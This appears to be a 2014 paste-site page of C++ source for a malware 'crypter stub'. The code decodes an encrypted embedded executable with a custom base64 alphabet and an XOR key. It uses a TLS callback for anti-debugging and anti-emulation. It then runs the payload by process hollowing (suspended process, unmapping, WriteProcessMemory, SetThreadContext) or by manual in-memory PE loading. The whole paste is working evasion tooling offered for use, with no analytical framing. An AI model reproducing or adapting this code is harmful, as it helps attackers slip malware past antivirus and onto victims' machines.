C++ Crypter Stub Source

SUBMITTED BY: Guest

DATE: July 5, 2014, 6:53 a.m.

FORMAT: C++

SIZE: 14.1 kB

Raw Download

HITS: 1002

Report
  1. #pragma warning(disable: 4244)
  3. #pragma comment(lib, "Shlwapi.lib")
  4. #pragma comment(linker,"/include:__tls_used")
  6. #pragma section(".CRT$XLB", read)
  8. #include <Windows.h>
  9. #include <Shlwapi.h>
  10. #include <assert.h>
  13. typedef LONG (WINAPI *NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
  15. static char encoding_table[] =
  16. {
  17. '=', 'w', 'e', 'r', 't', 'y', 'u', 'i',
  18. 'o', 'p', 'a', 's', 'd', 'f', 'g', 'h',
  19. '-', 'k', 'l', 'z', 'x', 'c', 'v', 'b',
  20. 'n', 'm', 'Q', 'W', 'E', 'R', 'T', 'Y',
  21. '<', 'I', 'O', 'P', 'A', 'S', 'D', 'F',
  22. 'G', 'H', 'J', '/', 'L', 'Z', '@', 'C',
  23. 'V', 'B', 'N', 'M', '9', '8', '7', '6',
  24. '5', '4', '3', '2', '1', '0', 'X', 'j'
  25. };
  27. static char *decoding_table = NULL;
  29. byte *mDecode(const char *data, DWORD input_length, DWORD *output_length)
  30. {
  32. byte *decoded_data;
  33. DWORD i = 0, j = 0;
  34. int a = 0;
  36. *output_length = input_length / 4 * 3;
  38. if (decoding_table == NULL)
  39. {
  40. decoding_table = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 256);
  42. for (int i = 0; i < 64; i++)
  43. {
  44. decoding_table[(byte) encoding_table[i]] = i;
  45. }
  46. }
  49. if (data[input_length - 1] == '#')
  50. {
  51. (*output_length)--;
  52. }
  54. if (data[input_length - 2] == '#')
  55. {
  56. (*output_length)--;
  57. }
  59. decoded_data = (byte*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, *output_length);
  61. if (decoded_data == NULL)
  62. {
  63. return NULL;
  64. }
  66. for (i = 0, j = 0; i < input_length;)
  67. {
  68. __int32 sextet_a, sextet_b, sextet_c, sextet_d, triple;
  70. sextet_a = data[i] == '#' ? 0 & i++ : decoding_table[data[i++]];
  71. sextet_b = data[i] == '#' ? 0 & i++ : decoding_table[data[i++]];
  72. sextet_c = data[i] == '#' ? 0 & i++ : decoding_table[data[i++]];
  73. sextet_d = data[i] == '#' ? 0 & i++ : decoding_table[data[i++]];
  75. triple = (sextet_a << 3 * 6) + (sextet_b << 2 * 6) + (sextet_c << 1 * 6) + (sextet_d << 0 * 6);
  77. if (j < *output_length)
  78. {
  79. decoded_data[j++] = (triple >> 2 * 8) & 0xFF;
  80. }
  82. if (j < *output_length)
  83. {
  84. decoded_data[j++] = (triple >> 1 * 8) & 0xFF;
  85. }
  87. if (j < *output_length)
  88. {
  89. decoded_data[j++] = (triple >> 0 * 8) & 0xFF;
  90. }
  92. }
  94. return decoded_data;
  95. }
  97. void Decode(byte *Data, DWORD Key, DWORD Size)
  98. {
  99. for(DWORD i = 0; i < Size; i++)
  100. {
  101. Data[i] ^= Key;
  102. Data[i] -= Key;
  103. }
  104. }
  107. void WINAPI TlsCallback(PVOID Module, DWORD Reason, PVOID Context)
  108. {
  109. DWORD dwAnti = 0xFFFFFFFF, Error = 0;
  110. VirtualProtectEx((HANDLE)0x154843, (LPVOID)0x388148, 0x14862, NULL, NULL);
  112. _asm
  113. {
  114. MOV EAX, FS:[18h];
  115. MOV EAX, [EAX+34h];
  116. MOV Error, EAX;
  117. }
  119. while(dwAnti != 0)
  120. {
  121. if(Error != ERROR_INVALID_PARAMETER)
  122. break;
  123. dwAnti--;
  124. }
  126. if(dwAnti)
  127. {
  128. ExitProcess(EXIT_FAILURE);
  129. }
  130. }
  133. HMODULE load_dll(const char *dll_name)
  134. {
  135. HMODULE module;
  137. module = GetModuleHandleA(dll_name);
  139. if (!module)
  140. {
  141. module = LoadLibraryA(dll_name);
  142. }
  144. return module;
  145. }
  148. #define MAKE_ORDINAL(val)(val & 0xffff)
  149. int load_imports(IMAGE_IMPORT_DESCRIPTOR *imp_desc, void *load_address)
  150. {
  151. while (imp_desc->Name || imp_desc->TimeDateStamp)
  152. {
  153. IMAGE_THUNK_DATA *name_table, *address_table, *thunk;
  155. char *dll_name = (char *)load_address + imp_desc->Name;
  157. HMODULE module = load_dll(dll_name);
  159. if (!module)
  160. {
  161. return 0;
  162. }
  164. name_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->OriginalFirstThunk);
  166. address_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->FirstThunk);
  168. thunk = name_table == load_address ? address_table : name_table;
  170. if (thunk == load_address)
  171. {
  172. return 0;
  173. }
  175. while (thunk->u1.AddressOfData)
  176. {
  177. unsigned char *func_name;
  179. if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
  180. {
  181. func_name = (unsigned char *)MAKE_ORDINAL(thunk->u1.Ordinal);
  182. }
  183. else
  184. {
  185. func_name = (BYTE*)((IMAGE_IMPORT_BY_NAME *)((char *)load_address + thunk->u1.AddressOfData))->Name;
  186. }
  188. address_table->u1.Function = (DWORD)GetProcAddress(module, (char *)func_name);
  190. thunk++;
  191. address_table++;
  192. }
  194. imp_desc++;
  195. }
  197. return 1;
  198. }
  200. void fix_relocations(IMAGE_BASE_RELOCATION *base_reloc, DWORD dir_size, DWORD new_imgbase, DWORD old_imgbase)
  201. {
  202. IMAGE_BASE_RELOCATION *cur_reloc = base_reloc, *reloc_end;
  204. DWORD delta = new_imgbase - old_imgbase;
  206. reloc_end = (IMAGE_BASE_RELOCATION *)((char *)base_reloc + dir_size);
  208. while (cur_reloc < reloc_end && cur_reloc->VirtualAddress)
  209. {
  210. int count = (cur_reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
  212. WORD *cur_entry = (WORD *)(cur_reloc + 1);
  214. void *page_va = (void *)((char *)new_imgbase + cur_reloc->VirtualAddress);
  216. while (count--)
  217. {
  218. if (*cur_entry >> 12 == IMAGE_REL_BASED_HIGHLOW)
  219. {
  220. *(DWORD *)((char *)page_va + (*cur_entry & 0x0fff)) += delta;
  221. }
  223. cur_entry++;
  224. }
  226. cur_reloc = (IMAGE_BASE_RELOCATION *)((char*)cur_reloc + cur_reloc->SizeOfBlock);
  227. }
  228. }
  230. IMAGE_NT_HEADERS *get_nthdrs(void *map)
  231. {
  232. IMAGE_DOS_HEADER *dos_hdr;
  233. dos_hdr = (IMAGE_DOS_HEADER *)map;
  234. return (IMAGE_NT_HEADERS *)((char*)map + dos_hdr->e_lfanew);
  235. }
  237. void *load_pe(void *fmap)
  238. {
  239. IMAGE_NT_HEADERS *nthdrs;
  241. IMAGE_DATA_DIRECTORY *reloc_entry, *imp_entry;
  243. void *vmap;
  245. WORD nsections, i;
  247. IMAGE_SECTION_HEADER *sec_hdr;
  249. size_t hdrs_size;
  251. IMAGE_BASE_RELOCATION *base_reloc;
  253. nthdrs = get_nthdrs(fmap);
  255. reloc_entry = &nthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
  257. if (!reloc_entry->VirtualAddress)
  258. {
  259. return NULL;
  260. }
  262. vmap = VirtualAlloc(NULL, nthdrs->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  264. if (!vmap)
  265. {
  266. return NULL;
  267. }
  269. nsections = nthdrs->FileHeader.NumberOfSections;
  271. sec_hdr = IMAGE_FIRST_SECTION(nthdrs);
  273. hdrs_size = (char*)(sec_hdr + nsections) - (char*)fmap;
  275. memcpy(vmap, fmap, hdrs_size);
  277. for (i = 0; i < nsections; i++)
  278. {
  279. size_t sec_size;
  280. sec_size = sec_hdr[i].SizeOfRawData;
  281. memcpy((char*)vmap + sec_hdr[i].VirtualAddress, (char*)fmap + sec_hdr[i].PointerToRawData, sec_size);
  282. }
  284. imp_entry = &nthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
  286. if (!load_imports((IMAGE_IMPORT_DESCRIPTOR *)((char*)vmap + imp_entry->VirtualAddress), vmap))
  287. {
  288. goto c;
  289. }
  291. base_reloc = (IMAGE_BASE_RELOCATION *)((char*)vmap + reloc_entry->VirtualAddress);
  293. fix_relocations(base_reloc, reloc_entry->Size, (DWORD)vmap, nthdrs->OptionalHeader.ImageBase);
  295. return (void *)((char*)vmap + nthdrs->OptionalHeader.AddressOfEntryPoint);
  297. c:
  299. VirtualFree(vmap, 0, MEM_RELEASE);
  301. return NULL;
  302. }
  305. int Executer(char *self)
  306. {
  308. HRSRC hRes = FindResourceA(NULL, "Strings", RT_RCDATA);
  310. HGLOBAL hGlob = LoadResource(NULL, hRes);
  312. char *FileData = (char*)LockResource(hGlob);
  314. DWORD FileDataSize = SizeofResource(NULL, hRes);
  316. DWORD FileDataDecodedSize = 0;
  318. byte *FileDataDecoded = mDecode(FileData, FileDataSize, &FileDataDecodedSize);
  320. Decode(FileDataDecoded, 1337, FileDataDecodedSize);
  322. PIMAGE_DOS_HEADER idh = (PIMAGE_DOS_HEADER)FileDataDecoded;
  323. PIMAGE_NT_HEADERS ith = (PIMAGE_NT_HEADERS)((DWORD)FileDataDecoded + idh->e_lfanew);
  325. if(ith->OptionalHeader.DataDirectory[14].VirtualAddress != 0)
  326. {
  327. MessageBoxA(HWND_DESKTOP, "Someone tried to i-n-f-e-c-t your pc with a .NET m-a-l-w-a-re, beware!!", "Skid warning", MB_OK | MB_ICONEXCLAMATION);
  328. ExitProcess(EXIT_FAILURE);
  329. }
  332. if(ith->OptionalHeader.DataDirectory[5].VirtualAddress == 0)
  333. {
  334. PIMAGE_DOS_HEADER IDH;
  336. PIMAGE_NT_HEADERS INH;
  338. PIMAGE_SECTION_HEADER ISH;
  340. PROCESS_INFORMATION PI;
  342. STARTUPINFOA SI;
  344. PCONTEXT CTX;
  346. PDWORD dwImageBase;
  348. NtUnmapViewOfSection xNtUnmapViewOfSection;
  350. LPVOID pImageBase;
  352. int Count;
  354. IDH = PIMAGE_DOS_HEADER(FileDataDecoded);
  355. if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
  356. {
  357. INH = PIMAGE_NT_HEADERS(DWORD(FileDataDecoded) + IDH->e_lfanew);
  358. if (INH->Signature == IMAGE_NT_SIGNATURE)
  359. {
  360. RtlZeroMemory(&SI, sizeof(SI));
  361. RtlZeroMemory(&PI, sizeof(PI));
  363. if (CreateProcessA(self, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
  364. {
  365. CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
  367. CTX->ContextFlags = CONTEXT_FULL;
  369. if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
  370. {
  371. ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
  373. if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
  374. {
  375. xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
  376. xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
  377. }
  379. pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
  381. if (pImageBase)
  382. {
  383. WriteProcessMemory(PI.hProcess, pImageBase, FileDataDecoded, INH->OptionalHeader.SizeOfHeaders, NULL);
  385. for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
  386. {
  387. ISH = PIMAGE_SECTION_HEADER(DWORD(FileDataDecoded) + IDH->e_lfanew + 248 + (Count * 40));
  388. WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(FileDataDecoded) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
  389. }
  391. WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
  393. CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
  395. SetThreadContext(PI.hThread, LPCONTEXT(CTX));
  397. ResumeThread(PI.hThread);
  398. }
  399. }
  400. }
  401. }
  402. }
  404. VirtualFree(FileDataDecoded, 0, MEM_RELEASE);
  405. }
  406. else
  407. {
  409. void *ep = load_pe(FileDataDecoded);
  411. if (!ep)
  412. {
  413. return EXIT_FAILURE;
  414. }
  416. __asm
  417. {
  418. mov ebx, fs:[0x30]
  419. mov eax, ep
  420. call eax
  421. }
  422. }
  424. return EXIT_SUCCESS;
  425. }
  427. LPSTR *CommandLineToArgvA(LPSTR lpCmdLine, int *pNumArgs)
  428. {
  429. int retval;
  431. retval = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS, lpCmdLine, -1, NULL, 0);
  433. if (!SUCCEEDED(retval))
  434. {
  435. return NULL;
  436. }
  438. LPWSTR lpWideCharStr = (LPWSTR)malloc(retval *sizeof(WCHAR));
  440. if (lpWideCharStr == NULL)
  441. {
  442. return NULL;
  443. }
  445. retval = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS, lpCmdLine, -1, lpWideCharStr, retval);
  447. if (!SUCCEEDED(retval))
  448. {
  449. free(lpWideCharStr);
  450. return NULL;
  451. }
  453. int numArgs;
  455. LPWSTR *args;
  457. args = CommandLineToArgvW(lpWideCharStr, &numArgs);
  459. free(lpWideCharStr);
  461. if (args == NULL)
  462. {
  463. return NULL;
  464. }
  466. int storage = numArgs * sizeof(LPSTR);
  468. for (int i = 0; i < numArgs; ++i)
  469. {
  470. BOOL lpUsedDefaultChar = FALSE;
  472. retval = WideCharToMultiByte(CP_ACP, 0, args[i], -1, NULL, 0, NULL, &lpUsedDefaultChar);
  474. if (!SUCCEEDED(retval))
  475. {
  476. LocalFree(args);
  477. return NULL;
  478. }
  480. storage += retval;
  481. }
  483. LPSTR* result = (LPSTR*)LocalAlloc(LMEM_FIXED, storage);
  485. if (result == NULL)
  486. {
  487. LocalFree(args);
  488. return NULL;
  489. }
  491. int bufLen = storage - numArgs * sizeof(LPSTR);
  493. LPSTR buffer = ((LPSTR)result) + numArgs * sizeof(LPSTR);
  495. for (int i = 0; i < numArgs; ++ i)
  496. {
  497. assert(bufLen > 0);
  499. BOOL lpUsedDefaultChar = FALSE;
  501. retval = WideCharToMultiByte(CP_ACP, 0, args[i], -1, buffer, bufLen, NULL, &lpUsedDefaultChar);
  503. if (!SUCCEEDED(retval))
  504. {
  505. LocalFree(result);
  506. LocalFree(args);
  507. return NULL;
  508. }
  510. result[i] = buffer;
  512. buffer += retval;
  514. bufLen -= retval;
  515. }
  517. LocalFree(args);
  519. *pNumArgs = numArgs;
  520. return result;
  521. }
  524. __declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK CallbackAddress[2] = { TlsCallback, NULL };
  526. int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  527. {
  528. int argc = 0;
  530. char **argv = CommandLineToArgvA(GetCommandLineA(), &argc);
  532. Executer(argv[0]);
  534. return EXIT_SUCCESS;
  535. }
comments powered by Disqus